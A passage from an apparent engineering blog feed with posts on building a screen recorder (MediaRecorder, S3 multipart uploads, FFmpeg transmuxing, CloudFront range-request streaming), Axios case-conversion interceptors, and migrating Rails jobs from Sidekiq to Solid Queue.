output.mp4</code></pre><ul><li><code>-c:v libx264</code> sets the video codec to libx264, which is a widely supportedH.264 codec.</li><li><code>-c:a aac</code> sets the audio codec to AAC, which is a commonly used audio codec.</li></ul><p>We could run FFMPEG on our web server and run the transcoding process. But thatwill not be easy to scale. So, we decided to use a serverless solution thatwould automatically scale. Since our input files were on AWS S3, AWS Lambda wasthe obvious choice.</p><p>We installed FFMPEG on <a href="https://aws.amazon.com/lambda/">AWS Lambda</a> using a<a href="https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html">Layer</a> asdescribed in this<a href="https://aws.amazon.com/blogs/media/processing-user-generated-content-using-aws-lambda-and-ffmpeg">post</a>.</p><p>We configured our input S3 bucket (one to which WEBM was uploaded) to triggerLambda whenever a new file was uploaded. FFMPEG would then transcode WEBM to MP4and store the output in another S3 bucket.</p><p>This worked as expected. But performance was still a problem. Time taken wasproportional to the input file size and took longer than we found acceptable.</p><h3>Transmuxing instead of transcoding</h3><p>Transmuxing or stream copy is a fast process that doesn't involve re-encodingbut instead directly copies the existing audio and video streams into a newcontainer format. This approach works well when the codecs used in the inputfile (WebM) are compatible with the output container format (MP4).</p><p>Popular browsers like Chrome, Brave, Safari etc. use the H264 codec for videoencoding. This is compatible with MP4. So transmuxing works flawlessly. ButFirefox uses the VP8 or VP9 codec, which is incompatible with MP4. Since we wereplanning to build a Chrome extension for NeetoRecor,d we only needed to worryabout Chrome and we could ignore Firefox users for now.</p><pre><code>ffmpeg -i input.webm -c:v copy -c:a copy output.mp4</code></pre><p>We modified the ffmpeg command as shown above. It now uses the <code>-c:v copy</code> and<code>-c:a copy</code> options, which copies the video and audio from the input file to theoutput file without re-encoding. MP4 conversion now become extremely fast, andthe time taken did not increase significantly with the size of the input file.</p><h2>Streaming</h2><p>Now that we successfully generated MP4 files, it was time to think of deliveringthe file efficiently to the client (browser) for playback. We had two problemsto solve:</p><ol><li><p>S3 is a storage service. It is not suitable for content delivery.</p><ul><li>Relatively high data transfer costs.</li><li>Storage is in one geographical region, resulting in slower delivery overthe network.</li></ul></li><li><p>Video files are large in size. Downloading the entire file and then playingit back is not efficient in terms of speed and data transfer. We needed tofind a way to allow streaming of the files. ie. deliver chunks of data as andwhen it was needed by the client.</p></li></ol><h3>Cloudfront as CDN</h3><p>CloudFront is a content delivery network (CDN) service provided by AWS. It canbe used as a CDN for S3, and this combination is a common architecture fordistributing content globally with low latency and high transfer speeds.</p><p>We created a CloudFront distribution, which is connected to our MP4 bucket. Oncethe distribution is deployed, we can access the MP4 files using the CloudFrontdomain name. When users request content through CloudFront, CloudFront checksits cache for the requested content. If the content is in the cache and is stillvalid (based on cache-control headers), CloudFront serves the content directlyfrom its edge locations, reducing latency. If the content is not in the cache oris expired, CloudFront retrieves the content from the S3 bucket, caches it, andserves it to the user. This helps reduce the load on our S3 bucket and improvesthe performance of content delivery.</p><h3>The HTTP Range request header</h3><p>HTTP Range requests allow clients to request specific portions of a file from aserver. This feature enables users to stream or download only parts of the filethey need, reducing bandwidth usage and improving user experience. At first, theclient could request the range for the beginning of the video file, and then, as theplayback proceeded, request subsequent parts. If the user moves back and forththe video using the seek bar, corresponding ranges can be requested.</p><pre><code>GET /example.mp4 HTTP/1.1Host: example.comRange: bytes=5000-9999</code></pre><p><code>Range: bytes=5000-9999</code> is the Range header indicating the specific bytes theclient wants to retrieve. In this case, the client requests bytes 5000 to 9999of the MP4 file. The numbering starts from zero, so byte 5000 means the 5001stbyte in the file.</p><p>Server responds with a <code>206</code> response (Partial content) with the requestsequence of bytes in the body. If the server does not support range requests,then it responds with a <code>200</code> along with the full content.</p><h4>Checking if the server supports Range requests</h4><p>We can perform a check by issuing a HEAD request to the server to see if theserver supports Range requests.</p><pre><code>curl -I http://abc.com/1.mp4</code></pre><p>If range requests are supported, then the server responds with a<code>Accept-Ranges: bytes</code> header.</p><pre><code>HTTP/1.1 200 OKAccept-Ranges: bytesContent-Length: 146515</code></pre><p>We did the test on our S3 bucket directly first, and then through Cloudfront.Both<a href="https://docs.aws.amazon.com/whitepapers/latest/s3-optimizing-performance-best-practices/use-byte-range-fetches.html">S3</a>and<a href="https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/RangeGETs.html">Cloudfront</a>supports Range request headers.</p><p>MP4, as mentioned above, supports streaming. It has metadata to help the serverdeliver it in chunks as requested. The HTML5 video player supports progressivedownload automatically by making use of HTTP Range headers.</p><p>So now we have our video in a file format that supports streaming (MP4), webserver that supports Range headers (S3 and Cloudfront) and a client that usesRange headers for progressive download - all the ingredients needed to supportstreaming.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Efficient uploading and persistent storage of NeetoRecord videos using AWS S3]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/persistant-storage-for-recordings-in-s3-loom-alternative-part-2"/>
      <updated>2024-03-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/persistant-storage-for-recordings-in-s3-loom-alternative-part-2</id>
      <content type="html"><![CDATA[<p>This is part 2 of our blog on how we are building<a href="https://www.neeto.com/neetorecord">NeetoRecord</a>, a Loom alternative. Here are<a href="https://www.bigbinary.com/blog/build-web-based-screen-recorder-loom-alternative-part-1">part 1</a>and<a href="https://www.bigbinary.com/blog/mp4_transmuxing_and_streaming_support-loom-alternative-part-3">part 3</a>.</p><p>In the previous blog, we learned how to use the Browser APIs to record the screenand generate a WEBM file. We now need to upload this file to persistent storageto have a URL to share our recording with our audience.</p><p>Uploading a large file all at once is time-consuming and prone to failure due tonetwork errors. The recording is generated in parts, each part pushed to anarray and joined together. So it would be ideal if we could upload these smallerparts as and when they are generated, and then join them together in the backend oncethe recording is completed. AWS's<a href="https://aws.amazon.com/s3/">Simple Storage Service (S3)</a> made a perfect fit asit provides cheap persistent storage, along with<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/mpuoverview.html">Multipart Uploads</a>feature.</p><p>S3 Multipart Uploads allow us to upload large objects in parts. Rather thanuploading the entire object in a single operation, multipart uploads break itdown into smaller parts, each ranging from 5 MB to 5 GB. Once uploaded, theseparts are aggregated to form the complete object.</p><h2>Initialization</h2><p>The process begins with an initiation request to S3, where a unique upload ID isgenerated. This upload ID is used to identify and manage the individual parts ofthe upload.</p><pre><code>s3 = Aws::S3::Client.newresp = s3.create_multipart_upload({  bucket: bucket_name,  key: object_key})upload_id = resp.upload_id</code></pre><h2>Upload Parts</h2><p>Once the upload is initiated, we can upload the parts to S3 independently. Eachpart is associated with a sequence number and an ETag (Entity Tag), a checksumof the part's data.</p><p>Note that the minimum content size for a part is 5MB (There is no minimum size limiton the last part of your multipart upload). So we store the recording chunks inlocal storage until they are bigger than 5MB. Once we have a part greater than5MB, we upload it to S3.</p><pre><code>part_number = 1content = recordedChunksresp = s3.upload_part({  body: content,  bucket: bucket_name,  key: object_key,  upload_id: upload_id,  part_number: part_number})puts &quot;ETag for Part #{part_number}: #{resp.etag}&quot;</code></pre><h2>Completion</h2><p>Once all parts are uploaded, a complete multipart upload request is sent to S3,specifying the upload ID and the list of uploaded parts along with their ETagsand sequence numbers. S3 then assembles the parts into a single object andfinalizes the upload.</p><pre><code>completed_parts = [  { part_number: 1, etag: 'etag_of_part_1' },  { part_number: 2, etag: 'etag_of_part_2' },  ...  { part_number: N, etag: 'etag_of_part_N' },]resp = s3.complete_multipart_upload({  bucket: bucket_name,  key: object_key,  upload_id: upload_id,  multipart_upload: {    parts: completed_parts  }})</code></pre><h2>Aborting and Cancelling</h2><p>At any point during the multipart upload process, you can abort or cancel theupload, which deletes any uploaded parts associated with the upload ID.</p><pre><code>s3.abort_multipart_upload({  bucket: bucket_name,  key: object_key,  upload_id: upload_id})</code></pre><p>The uploaded file will finally be available at <code>s3://bucket_name/object_id</code></p><p>S3 Multipart Uploads offers us several advantages:</p><h3>Fault tolerance</h3><p>We can resume uploads from where they left off in case of network failures orinterruptions. Also, uploading large objects in smaller parts reduces thelikelihood of timeouts and connection failures, especially in high-latency orunreliable network environments.</p><h3>Upload speed optimization</h3><p>With multipart uploads, you can parallelize the process by uploading multipleparts concurrently, optimizing transfer speeds and reducing overall upload time.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Building a web-based screen recorder]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/build-web-based-screen-recorder-loom-alternative-part-1"/>
      <updated>2024-03-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/build-web-based-screen-recorder-loom-alternative-part-1</id>
      <content type="html"><![CDATA[<p>This is part 1 of our blog on how we are building<a href="https://www.neeto.com/neetorecord">NeetoRecord</a>, a Loom alternative. Here are<a href="https://www.bigbinary.com/blog/persistant-storage-for-recordings-in-s3-loom-alternative-part-2">part 2</a>and<a href="https://www.bigbinary.com/blog/mp4_transmuxing_and_streaming_support-loom-alternative-part-3">part 3</a>.</p><p>At <a href="https://neeto.com">neeto</a>, the product team, developers, and the UI teamoften communicate using short videos and screen recordings. We relied on popularsolutions like Loom and Bubbles. But they allowed only a small number ofrecordings in their free versions, and soon, they presented us with the upgradedscreens - upgrades were quite expensive for our team due to our team size andthe number of recordings we made daily.</p><p>So, we decided to build our own solution. We found the browser'sMediaStream Recording API.</p><h2>MediaStream Recording API</h2><p>The MediaStream Recording API, sometimes called the MediaRecorder API, isclosely affiliated with the<a href="https://developer.mozilla.org/en-US/docs/Web/API/Media_Capture_and_Streams_API">Media Capture and Streams API</a>and the<a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API">WebRTC API</a>. TheMediaStream Recording API enables capturing the data generated by a MediaStreamor HTMLMediaElement. Captured video data is in WebM format. We can play it backlater using the<a href="https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement">HTMLVideoElement</a>on any video player that supports WebM playback.</p><p>We will build a basic recorder that records the screen, audio from themicrophone, and then plays it back. We will first look at different fragments ofcode for recording the screen, recording audio, playing back in the browser andthen downloading the video file. At the end, we will combine them into afully working web-based screen recorder program.</p><h3>Record the screen</h3><pre><code class="language-javascript">let mediaRecorder;let recordedChunks = [];const stream = await navigator.mediaDevices.getDisplayMedia({  video: true,});mediaRecorder = new MediaRecorder(stream);mediaRecorder.ondataavailable = event =&gt; {  recordedChunks.push(event.data);};</code></pre><p><code>getDisplayMedia()</code> is provided by the<a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API">WebRTC</a> (WebReal-Time Communication) API. It captures the contents of the user's screen orspecific application windows. <code>getDisplayMedia()</code> method prompts the user toselect and grant permission to capture the contents of a display or portionthereof (such as a window) as a MediaStream.</p><p>There is a similar method called <code>getUserMedia()</code>. It is typically used forapplications like video conferencing and live streaming. When you call<code>getUserMedia()</code>, the browser prompts the user for permission to access theircamera and microphone.</p><p>When there is recorded data available, <code>ondataavailable()</code> callback istriggered. We could process the data in this callback. In our case, we collectthe data by appending it to an array named <code>recordedChunks</code>.</p><h3>Record audio</h3><pre><code class="language-javascript">let audioStream = await window.navigator.mediaDevices.getUserMedia({  audio: { echoCancellation: true, noiseSuppression: true },});</code></pre><p>To capture audio, we use <code>getUserMedia()</code>. It is typically used for applicationslike video conferencing and live streaming. When you call <code>getUserMedia()</code>, thebrowser prompts the user for permission to access their camera and microphone.But we want to capture only the audio, so we pass the <code>audio</code> parameter.</p><p>The <code>audio</code> key accepts a set of parameters that would let us control thequality and properties of the captured audio stream. In our example, we haveenabled <code>echoCancellation</code> and <code>noiseSuppression</code> - two good features that wouldenhance the quality of our screen recordings. The complete list of audio optionsis available<a href="%5Bhttps://developer.mozilla.org/en-US/docs/Web/API/MediaTrackSettings#instance_properties_of_audio_tracks">here</a>.</p><p>The audio stream could be composed of multiple audio tracks - the microphone,system sounds, etc. We will add these tracks to the video stream we hadpreviously set up using <code>getDisplayMedia()</code>.</p><pre><code class="language-javascript">audioStream.getAudioTracks().forEach(audioTrack =&gt; stream.addTrack(audioTrack));</code></pre><h3>Playback the recording</h3><p>We now have an array named <code>recordedChunks</code>, which contains sequential chunks ofthe recorded data. Video players need video data as a<a href="https://developer.mozilla.org/en-US/docs/Web/API/Blob">Blob</a>. A blob is afile-like object of immutable, raw binary/text data. We must convert our<code>recordedChunks</code> array into a <code>Blob</code> to be played back or written into a file.</p><p>To construct a Blob from other non-blob objects and data, we can use the<code>Blob()</code> constructor.</p><pre><code class="language-javascript">const blob = new Blob(recordedChunks, {  type: &quot;video/webm&quot;,});</code></pre><p>Suppose we have an<a href="https://www.w3schools.com/tags/tag_video.asp">HTML video tag</a> in our page.</p><pre><code class="language-html">&lt;video id=&quot;recordedVideo&quot; controls&gt;&lt;/video&gt;</code></pre><p>When the video recording is stopped, we could create an Object URL for ourrecording <code>blob</code> and attach it to the video player.</p><pre><code class="language-javascript">mediaRecorder.onstop = () =&gt; {  let recordedVideo = document.getElementById(&quot;recordedVideo&quot;);  recordedVideo.src = URL.createObjectURL(blob);};</code></pre><p>We can now play the recording on the HTML video player.</p><p>Similarly, we can create a download link using the Object URL for the recording<code>blob</code>.</p><pre><code class="language-javascript">let a = document.createElement(&quot;a&quot;);let url = URL.createObjectURL(blob);a.href = url;</code></pre><p>We can now download and play the recording locally on any video playersupporting WebM playback.</p><h2>Putting it all together</h2><p>We have glued together the code fragments discussed above and created a<a href="/blog/neeto_record/basic_screen_recorder.html">demo</a> for a basic web-basedscreen recorder.</p><p>You may view the source code<a href="https://gist.github.com/unnitallman/6a054300f8bba645d42fd04008ea6ff1">here</a>.</p><h2>Next steps</h2><p>Now that we have a basic screen recorder in place, we have to consider thefollowing:</p><ol><li>Persistent storage.</li><li>Chunked uploading.</li><li>CDN support.</li><li>Playback with support for streaming.</li></ol><p>We will cover these topics in the next set of blogs. Stay tuned.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Automating Case Conversion in Axios for Seamless Frontend-Backend Integration]]></title>
       <author><name>Ajmal Noushad</name></author>
      <link href="https://www.bigbinary.com/blog/axios-case-conversion"/>
      <updated>2024-03-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/axios-case-conversion</id>
      <content type="html"><![CDATA[<p>In the world of web development, conventions often differ between backend andfrontend technologies. This becomes evident when comparing variable naming caseconventions used in Ruby on Rails (snake case) and JavaScript (camel case). AtNeeto, this difference posed a major hurdle: the requirement for manual caseconversion between requests and responses. As a result, there was a significantamount of repetitive code needed to handle this conversion.</p><p>Heres a snippet illustrating the issue faced by our team:</p><pre><code class="language-js">// For requests, we had to manually convert camelCase values to snake_case.const createUser = ({ userName, fullName, dateOfBirth }) =&gt;  axios.post(&quot;/api/v1/users&quot;, {    user_name: userName,    full_name: fullName,    date_of_birth: dateOfBirth,  });// For responses, we had to manually convert snake_case values to camelCaseconst {  user_name: userName,  full_name: fullName,  date_of_birth: dateOfBirth,} = await axios.get(&quot;/api/v1/users/user-id-1&quot;);</code></pre><p>This manual conversion process consumed valuable development time and introducedthe risk of errors or inconsistencies in data handling.</p><p>To streamline our workflow and enhance interoperability between the frontend andbackend, we decided to automate case conversion.</p><h2>Implementing automatic case conversion</h2><p>Implementing automatic case conversion across Neeto products required athoughtful approach to minimize disruptions and ensure a smooth transition.Here's how we achieved this goal while minimizing potential disruptions:</p><h3>1. Axios Interceptors for Recursive Case Conversion</h3><p>We created a pair of Axios interceptors to handle case conversion for requestsand responses. The interceptors were designed to recursively convert the cases,managing the translation between snake case and camel case as data traveledbetween the frontend and backend. This smooth transition simplified theworkflow, cutting out the requirement for manual case conversion in mostsituations.</p><h3>2. Custom Parameters to Control Case Conversion</h3><p>To do a smooth rollout without breaking any products, and due to certain specialAPIs requiring specific case conventions due to legacy reasons or externaldependencies, we introduced custom parameters <code>transformResponseCase</code> and<code>transformRequestCase</code> within Axios. These parameters allowed developers toopt-out of the automatic case conversion for specific API endpoints. Byconfiguring these parameters appropriately, we prevented unintentional caseconversions where needed, maintaining compatibility with APIs that requireddifferent conventions.</p><p>This is how we crafted our axios interceptors:</p><pre><code class="language-js">import {  keysToCamelCase,  serializeKeysToSnakeCase,} from &quot;@bigbinary/neeto-cist&quot;;// To transform response data to camel caseconst transformResponseKeysToCamelCase = response =&gt; {  const { transformResponseCase = true } = response.config;  if (response.data &amp;&amp; transformResponseCase) {    response.data = keysToCamelCase(response.data);  }  return response;};// To transform error response data to camel caseconst transformErrorKeysToCamelCase = error =&gt; {  const { transformResponseCase = true } = error.config ?? {};  if (error.response?.data &amp;&amp; transformResponseCase) {    error.response.data = keysToCamelCase(error.response.data);  }  return error;};// To transform the request payload to snake_caseconst transformDataToSnakeCase = request =&gt; {  const { transformRequestCase = true } = request;  if (!transformRequestCase) return request;  request.data = serializeKeysToSnakeCase(request.data);  request.params = serializeKeysToSnakeCase(request.params);  return request;};// Adding interceptorsaxios.interceptors.request.use(transformDataToSnakeCase);axios.interceptors.response.use(  transformResponseKeysToCamelCase,  transformErrorKeysToCamelCase);</code></pre><p>Note that <code>keysToCamelCase</code>, <code>serializeKeysToSnakeCase</code> are methods from ouropen source pure utils library<a href="https://github.com/bigbinary/neeto-cist"><code>@bigbinary/neeto-cist</code></a>.</p><p>While rolling out the change to all products, we wrote a JSCodeShift script toautomatically add these flags to every Axios API requests in all Neeto productsto ensure that nothing was broken due to it. Then the team had manually wentthrough the code base and removed those flags while making the necessary changesto the code.</p><p>After the change was introduced the API code was much cleaner without theboilerplate for case conversion.</p><pre><code class="language-js">// Requestconst createUser = ({ userName, fullName, dateOfBirth }) =&gt;  axios.post(&quot;/api/v1/users&quot;, { userName, fullName dateOfBirth })// Responseconst { userName, fullName, dateOfBirth } = await axios.get(&quot;/api/v1/users/user-id-1&quot;);</code></pre><h2>Pain points</h2><p>In our work towards automating case conversion within neeto, we encounteredseveral pain points.</p><h3>1. Manual work is involved</h3><p>During the rollout phase of our automated case conversion solution, there was anunavoidable requirement for manual intervention. As we transitioned the existingcode bases to incorporate the new mechanisms for automatic case conversionwithin Axios, each Axios call needed an adjustment to remove the manual caseconversion codes written before.</p><p>This stage demanded some manual work from our development teams. They updatedand modified existing Axios requests across multiple projects to ensure theyaligned with the new automated case conversion mechanism. While this manualeffort temporarily increased the workload, it was a necessary step to implement theautomated solution effectively across Neeto.</p><p>This phase highlighted the importance of a structured rollout plan andmeticulous attention to detail. Despite the initial manual workload, once thechanges were applied uniformly across the codebase, the benefits of automatedcase conversion quickly became evident, significantly reducing ongoing manualefforts and improving the overall efficiency of our development process.</p><h3>2. Serialization Issues</h3><p>As our initial implementation of automated case conversion, we used<code>keysToSnakeCase</code> method, which recursively transforms all the keys to snakecase for a given object. It internally used <code>transformObjectDeep</code> function torecursively traverse through each key-value pair inside an object fortransformation.</p><pre><code class="language-js">import { camelToSnakeCase } from &quot;@bigbinary/neeto-cist&quot;;const transformObjectDeep = (object, keyValueTransformer) =&gt; {  if (Array.isArray(object)) {    return object.map(obj =&gt;      transformObjectDeep(obj, keyValueTransformer, objectPreProcessor)    );  } else if (object === null || typeof object !== &quot;object&quot;) {    return object;  }  return Object.fromEntries(    Object.entries(object).map(([key, value]) =&gt;      keyValueTransformer(        key,        transformObjectDeep(value, keyValueTransformer, objectPreProcessor)      )    )  );};export const keysToSnakeCase = object =&gt;  transformObjectDeep(object, (key, value) =&gt; [camelToSnakeCase(key), value]);</code></pre><p>However, this recursive transformation approach led to a serialization issue,especially with objects that required special treatment, such as <code>dayjs</code> objectsrepresenting dates. The method treated these objects like any other JavaScriptobject, causing unexpected transformations and resulting in invalid payload datain some cases.</p><p>To mitigate these serialization issues and prevent interference with specificobject types, we enhanced the <code>transformObjectDeep</code> method to accommodate apreprocessor function for objects before the transformation:</p><pre><code class="language-js">const transformObjectDeep = (  object,  keyValueTransformer,  objectPreProcessor = undefined) =&gt; {  if (objectPreProcessor &amp;&amp; typeof objectPreProcessor === &quot;function&quot;) {    object = objectPreProcessor(object);  }  // Existing transformation logic};</code></pre><p>This modification allowed us to serialize objects before initiating thetransformation process. To facilitate this, we introduced a new method,<code>serializeKeysToSnakeCase</code>, incorporating the object preprocessor. For specificobject types requiring special serialization, such as <code>dayjs</code> objects, weleveraged the built-in <code>toJSON</code> method, allowing the object to transform itselfto its desired format, such as a date string:</p><pre><code class="language-js">import { transformObjectDeep, camelToSnakeCase } from &quot;@bigbinary/neeto-cist&quot;;export const serializeKeysToSnakeCase = object =&gt;  transformObjectDeep(    object,    (key, value) =&gt; [camelToSnakeCase(key), value],    object =&gt; (typeof object?.toJSON === &quot;function&quot; ? object.toJSON() : object)  );</code></pre><p>This resolved the serialization issue for the request payloads. Since theresponse is always in JSON format, all values are objects, arrays, orprimitives. It won't contain such 'magical' objects. So we need this logic onlyfor request interceptors.</p><h2>Conclusion</h2><p>In simplifying our web development workflow at Neeto, automating case conversionproved crucial. Despite challenges during implementation, refining our methodsstrengthened our system. By streamlining data translation and overcoming hurdleslike serialization issues, we've improved efficiency and compatibility acrossour ecosystem.</p><p>If you're starting a new project, adopting automated case conversion mechanismssimilar to what we've built in Axios can offer significant advantages.Implementing these standards from the beginning promotes consistency andsimplifies how data moves between your frontend and backend systems. Introducingthese practices early in your project's lifecycle help sidestep thedifficulties of adjusting existing code and establishing a unified conventionthroughout your project's structure.</p><p>For existing projects, adopting automated case conversion might initially comewith a cost. Introducing these changes requires careful planning and executionto minimize disruptions. The rollout process might necessitate manual updatesacross various parts of the codebase, leading to increased workload andpotential short-term setbacks.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we migrated from Sidekiq to Solid Queue]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-to-solid-queue-from-sidekiq"/>
      <updated>2024-03-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-to-solid-queue-from-sidekiq</id>
      <content type="html"><![CDATA[<p>BigBinary is building a suite of products under <a href="https://neeto.com">neeto</a>. Wecurrently have around 22 products under development, and all of the products areusing <a href="https://github.com/sidekiq/sidekiq">Sidekiq</a>. After the<a href="https://dev.37signals.com/introducing-solid-queue/">launch of Solid Queue</a>, wedecided to migrate <a href="https://neeto.com/neetoform">NeetoForm</a> from Sidekiq toSolid Queue.</p><p>Please note that Solid Queue currently doesn't support cron-style or recurringjobs. There is a <a href="https://github.com/basecamp/solid_queue/pull/155">PR open</a>regarding this issue. We have only partially migrated to Solid Queue. Forrecurring jobs, we are still using Sidekiq. Once the PR is merged, we willmigrate completely to Solid Queue.</p><h2>Migrating to Solid Queue from Sidekiq</h2><p>Here is a step-by-step migration guide you can use to migrate your Railsapplication from Sidekiq to Solid Queue.</p><h2>1. Installation</h2><ul><li>Add <code>gem &quot;solid_queue&quot;</code> to your Rails application's Gemfile and run<code>bundle install</code>.</li><li>Run <code>bin/rails generate solid_queue:install</code> which copies the config file andthe required migrations.</li><li>Run the migrations using <code>bin/rails db:migrate</code>.</li></ul><h2>2. Configuration</h2><p>The installation step should have created a <code>config/solid_queue.yml</code> file.Uncomment the file and modify it as per your needs. Here is how the file looksfor our application.</p><pre><code class="language-yaml">default: &amp;default  dispatchers:    - polling_interval: 1      batch_size: 500  workers:    - queues: &quot;auth&quot;      threads: 3      processes: 1      polling_interval: 0.1    - queues: &quot;urgent&quot;      threads: 3      processes: 1      polling_interval: 0.1    - queues: &quot;low&quot;      threads: 3      processes: 1      polling_interval: 2    - queues: &quot;*&quot;      threads: 3      processes: 1      polling_interval: 1development:  &lt;&lt;: *defaultstaging:  &lt;&lt;: *defaultheroku:  &lt;&lt;: *defaulttest:  &lt;&lt;: *defaultproduction:  &lt;&lt;: *default</code></pre><h2>3. Starting Solid Queue</h2><p>On your development machine, you can start Solid Queue by running the followingcommand.</p><pre><code>bundle exec rake solid_queue:start</code></pre><p>This will start Solid Queue's supervisor process and will start processing anyenqueued jobs. The supervisor process forks<a href="https://github.com/basecamp/solid_queue?tab=readme-ov-file#workers-and-dispatchers">workers and dispatchers</a>according to the configuration provided in the <code>config/solid_queue.yml</code> file.The supervisor process also controls the heartbeats of workers and dispatchers,and sends signals to stop and start them when needed.</p><p>Since we use <a href="https://github.com/ddollar/foreman">foreman</a>, we added the abovecommand to our Procfile.</p><pre><code class="language-ruby"># Procfileweb:  bundle exec puma -C config/puma.rbworker: bundle exec sidekiq -C config/sidekiq.ymlsolidqueueworker: bundle exec rake solid_queue:startrelease: bundle exec rake db:migrate</code></pre><h2>4. Setting the Active Job queue adapter</h2><p>You can set the Active Job queue adapter to <code>:solid_queue</code> by adding thefollowing line in your <code>application.rb</code> file.</p><pre><code class="language-ruby"># application.rbconfig.active_job.queue_adapter = :solid_queue</code></pre><p>The above change sets the queue adapter at the application level for all thejobs. However, since we wanted to use Solid Queue for our regular jobs andcontinue using Sidekiq for cron jobs, we didn't make the above change in<code>application.rb</code>.</p><p>Instead, we created a new base class that inherited from <code>ApplicationJob</code> andset the queue adapter to <code>:solid_queue</code> inside that.</p><pre><code class="language-ruby"># sq_base_job.rbclass SqBaseJob &lt; ApplicationJob  self.queue_adapter = :solid_queueend</code></pre><p>Then we made all the classes implementing regular jobs inherit from this newclass <code>SqBaseJob</code> instead of <code>ApplicationJob</code>.</p><pre><code class="language-diff"># send_email_job.rb- class SendEmailJob &lt; ApplicationJob+ class SendEmailJob &lt; SqBaseJob  # ...end</code></pre><p>By making the above change, all our regular jobs got enqueued via Solid Queueinstead of Sidekiq.</p><p>But we realized later that emails were still being sent via Sidekiq. Ondebugging and looking into Rails internals, we found that <code>ActionMailer</code> uses<code>ActionMailer::MailDeliveryJob</code> for enqueuing or sending emails.</p><p><code>ActionMailer::MailDeliveryJob</code> inherits from <code>ActiveJob::Base</code> rather than theapplication's <code>ApplicationJob</code>. So even if we set the queue_adapter in<code>application_job.rb</code>, it won't work. <code>ActionMailer::MailDeliveryJob</code> fallbacksto using the adapter defined in <code>application.rb</code> or environment-specific(production.rb / staging.rb / development.rb) config files. But we can't do thatbecause we still want to use Sidekiq for cron jobs.</p><p>To use Solid Queue for mailers, we needed to override the queue_adapter formailers. We can do that in <code>application_mailer.rb</code>.</p><pre><code class="language-ruby"># application_mailer.rbclass ApplicationMailer &lt; ActionMailer::Base  # ...  ActionMailer::MailDeliveryJob.queue_adapter = :solid_queueend</code></pre><p>This change is only until we use both Sidekiq and Solid Queue. Once cron stylejobs feature lands in Solid Queue, we can remove this override and set thequeue_adapter directly in <code>application.rb</code>, which will enforce the settingglobally.</p><h2>5. Code changes</h2><p>For migrating from Sidekiq to Solid Queue, we had to make the following changesto the syntax for enqueuing a job.</p><ul><li>Replaced <code>.perform_async</code> with <code>.perform_later</code>.</li><li>Replaced <code>.perform_at</code> with <code>.set(...).perform_later(...)</code>.</li></ul><pre><code class="language-diff">- SendMailJob.perform_async+ SendMailJob.perform_later- SendMailJob.perform_at(1.minute.from_now)+ SendMailJob.set(wait: 1.minute).perform_later</code></pre><p>At some places we were storing the Job ID on a record, for querying the job'sstatus or for cancelling the job. For such cases, we made the following change.</p><pre><code class="language-diff">def disable_form_at_deadline- job_id = DisableFormJob.perform_at(deadline, self.id)- self.disable_job_id = job_id+ job_id = DisableFormJob.set(wait_until: deadline).perform_later(self.id)+ self.disable_job_id = job.job_idenddef cancel_form_deadline- Sidekiq::Status.cancel(self.disable_job_id)+ SolidQueue::Job.find_by(active_job_id: self.disable_job_id).destroy!  self.disable_job_id = nilend</code></pre><h2>6. Error handling and retries</h2><p>Initially, we thought the<a href="https://github.com/basecamp/solid_queue?tab=readme-ov-file#other-configuration-settings"><code>on_thread_error</code> configuration</a>provided by Solid Queue can be used for error handling. However, during thedevelopment phase, we noticed that it wasn't capturing errors. We raised<a href="https://github.com/basecamp/solid_queue/issues/120">an issue with Solid Queue</a>as we thought it was a bug.</p><p><a href="https://github.com/rosa">Rosa Gutirrez</a><a href="https://github.com/basecamp/solid_queue/issues/120#issuecomment-1894413948">responded</a>on the issue and clarified the following.</p><blockquote><p><code>on_thread_error</code> wasn't intended for errors on the job itself, but rathererrors in the thread that's executing the job, but around the job itself. Forexample, if you had an Active Record's thread pool too small for your numberof threads and you got an error when trying to check out a new connection,on_thread_error would be called with that.</p><p>For errors in the job itself, you could try to hook into Active Job's itself.</p></blockquote><p>Based on the above information, we modified our <code>SqBaseJob</code> base class to handlethe exceptions and report it to <a href="https://www.honeybadger.io/">Honeybadger</a>.</p><pre><code class="language-ruby"># sq_base_job.rbclass SqBaseJob &lt; ApplicationJob  self.queue_adapter = :solid_queue  rescue_from(Exception) do |exception|    context = {      error_class: self.class.name,      args: self.arguments,      scheduled_at: self.scheduled_at,      job_id: self.job_id    }    Honeybadger.notify(exception, context:)    raise exception  endend</code></pre><p>Remember we mentioned that <code>ActionMailer</code> doesn't inherit from <code>ApplicationJob</code>.So similarly, we would have to handle exceptions for Mailers separately.</p><pre><code class="language-ruby"># application_mailer.rbclass ApplicationMailer &lt; ActionMailer::Base  # ...  ActionMailer::MailDeliveryJob.rescue_from(Exception) do |exception|    context = {      error_class: self.class.name,      args: self.arguments,      scheduled_at: self.scheduled_at,      job_id: self.job_id    }    Honeybadger.notify(exception, context:)    raise exception  endend</code></pre><p>For retries, unlike Sidekiq, Solid Queue doesn't include any automatic retrymechanism, it<a href="https://edgeguides.rubyonrails.org/active_job_basics.html#retrying-or-discarding-failed-jobs">relies on Active Job for this</a>.We wanted our application to retry sending emails in case of any errors. So weadded the retry logic in the <code>ApplicationMailer</code>.</p><pre><code class="language-ruby"># application_mailer.rbclass ApplicationMailer &lt; ActionMailer::Base  # ...  ActionMailer::MailDeliveryJob.retry_on StandardError, attempts: 3end</code></pre><p>Note that, although the queue adapter configuration can be removed from<code>application_mailer.rb</code> once the entire application migrates to Solid Queue,error handling and retry override cannot be removed because of the way<code>ActionMailer::MailDeliveryJob</code> inherits from <code>ActiveJob::Base</code> rather thanapplication's 